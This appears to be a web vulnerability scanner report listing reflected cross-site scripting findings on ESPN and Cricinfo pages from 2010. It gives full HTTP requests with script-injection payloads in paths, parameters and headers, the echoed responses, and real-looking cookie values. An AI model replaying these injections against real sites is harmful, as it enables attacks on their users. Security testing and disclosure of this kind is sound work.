s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 133 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en67f2a<script>alert(1)</script>2fd0abe5ee5/entry</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9d1a<script>alert(1)</script>bc676b3bd41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/entryc9d1a<script>alert(1)</script>bc676b3bd41 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 130 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryc9d1a<script>alert(1)</script>bc676b3bd41</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1f44<script>alert(1)</script>648104297fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enf1f44<script>alert(1)</script>648104297fd/entryStats HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 138 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf1f44<script>alert(1)</script>648104297fd/entryStats</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73792<script>alert(1)</script>b498764bc6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/entryStats73792<script>alert(1)</script>b498764bc6c HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 135 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/entryStats73792<script>alert(1)</script>b498764bc6c</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f170a<script>alert(1)</script>a531fa92f90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enf170a<script>alert(1)</script>a531fa92f90/story HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 133 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enf170a<script>alert(1)</script>a531fa92f90/story</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f72f3<script>alert(1)</script>5c58c16e8fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/storyf72f3<script>alert(1)</script>5c58c16e8fd HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 130 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/storyf72f3<script>alert(1)</script>5c58c16e8fd</BODY></HTML>
The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a682"><script>alert(1)</script>a5ecb98fc96 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51d4a"><script>alert(1)</script>ae55648a8a6 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2d5"><script>alert(1)</script>b00739a6776 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ci/content/submit/member_mgmt/user_registration.html?bb2d5"><script>alert(1)</script>b00739a6776=1 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:14:08 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148320 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:14:08 ...[SNIP]... <input type="hidden" name="referer" value="/ci/content/submit/member_mgmt/user_registration.html?bb2d5"><script>alert(1)</script>b00739a6776=1"> ...[SNIP]...
The value of the object_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 264cf"><script>alert(1)</script>5ffea527bb5 was submitted in the object_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ci/content/submit/member_mgmt/user_registration.html?object_id=485657;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad264cf"><script>alert(1)</script>5ffea527bb5 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:12:39 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148519 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:12:39 ...[SNIP]... ="hidden" name="referer" value="/ci/content/submit/member_mgmt/user_registration.html?object_id=485657;sc=Comments;ref=http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html?5fcad264cf"><script>alert(1)</script>5ffea527bb5"> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5bb4b<script>alert(1)</script>67896ac1a97 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/login_validate.html?callback=?5bb4b<script>alert(1)</script>67896ac1a97 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
2.131. http://submit.cricinfo.com/member_mgmt/content/submit/member_mgmt/user_registration.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e3a"><script>alert(1)</script>f099b4e3b36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html?e4e3a"><script>alert(1)</script>f099b4e3b36=1 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:18:36 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148438 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:18:36 ...[SNIP]... <input type="hidden" name="referer" value="/member_mgmt/content/submit/member_mgmt/user_registration.html?e4e3a"><script>alert(1)</script>f099b4e3b36=1"> ...[SNIP]...
The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b6a6"><script>alert(1)</script>dbf3b9311b was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/user_registration.html?sc=masthead9b6a6"><script>alert(1)</script>dbf3b9311b HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:17:04 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 148538 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:17:04 ...[SNIP]... <input type="hidden" name="SourceCategory" value="masthead9b6a6"><script>alert(1)</script>dbf3b9311b"> ...[SNIP]...
The value of the remember request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517ee"><script>alert(1)</script>3bb15ef92c9 was submitted in the remember parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /member_mgmt/content/submit/member_mgmt/user_screenname.html?remember=517ee"><script>alert(1)</script>3bb15ef92c9 HTTP/1.1 Host: submit.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Q_cricinfo_cluster=usa; Q_cricinfo_country=us;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 03:16:53 GMT Server: Apache Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: Sun, 06 Jan 1985 03:30:00 GMT Content-Length: 11715 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: submit, country: us, cluster: usa, created: 2010-11-07 03:16:53 ...[SNIP]... <input type="hidden" name="remember" id="WelcomeScrName" value="517ee"><script>alert(1)</script>3bb15ef92c9"> ...[SNIP]...
2.134. http://www.cricinfo.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cricinfo.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e51e2"><script>alert(1)</script>8865afff4f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e51e2"><script>alert(1)</script>8865afff4f6=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=60 Content-Type: text/html; charset=UTF-8 X-Varnish: 711005270 X-Varnish-Cache: MISS X-Varnish: 894769522 Date: Sat, 06 Nov 2010 17:30:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 157965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci031, country: us, cluster: usa, created: 2010-11-06 17:30:27 ...[SNIP]... <div class="stryEnlarge sectionImgEn" style="padding:0;margin:0 0 0 5px;" onClick="clickMap('index','homepage',null,this,s_omni.prop4,'/ci/content/current/site/index.html?e51e2"><script>alert(1)</script>8865afff4f6=1')"> ...[SNIP]...
2.135. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcad"><script>alert(1)</script>7b256488062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=300 Content-Type: text/html; charset=UTF-8 X-Varnish: 708574769 X-Varnish-Cache: MISS X-Varnish: 891736454 Date: Sat, 06 Nov 2010 14:03:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 145607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci034, country: us, cluster: usa, created: 2010-11-06 14:03:26 ...[SNIP]... <a href="/australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1;wrappertype=print" id="printIcon" alt="Print" title="Print"> ...[SNIP]...
2.136. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485685.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7798c"><script>alert(1)</script>fb43bde1b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=300 Content-Type: text/html; charset=UTF-8 X-Varnish: 708563898 X-Varnish-Cache: MISS X-Varnish: 891722930 Date: Sat, 06 Nov 2010 14:02:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 151047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci030, country: us, cluster: usa, created: 2010-11-06 14:02:35 ...[SNIP]... <a href="/australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1;wrappertype=print" id="printIcon" alt="Print" title="Print"> ...[SNIP]...
2.137. http://www.cricinfo.com/pakistan-v-south-africa-2010/content/story/485578.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be18"><script>alert(1)</script>a66a096602c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1 HTTP/1.1 Host: www.cricinfo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: public, max-age=300 Content-Type: text/html; charset=UTF-8 X-Varnish: 708580736 X-Varnish-Cache: MISS X-Varnish: 891743888 Date: Sat, 06 Nov 2010 14:03:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 155901
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- hostname: wci029, country: us, cluster: usa, created: 2010-11-06 14:03:54 ...[SNIP]... <a href="/pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1;wrappertype=print" id="printIcon" alt="Print" title="Print"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 296e5"><script>alert(1)</script>e5a735cc086 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a22ce"><script>alert(1)</script>99653f53917 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
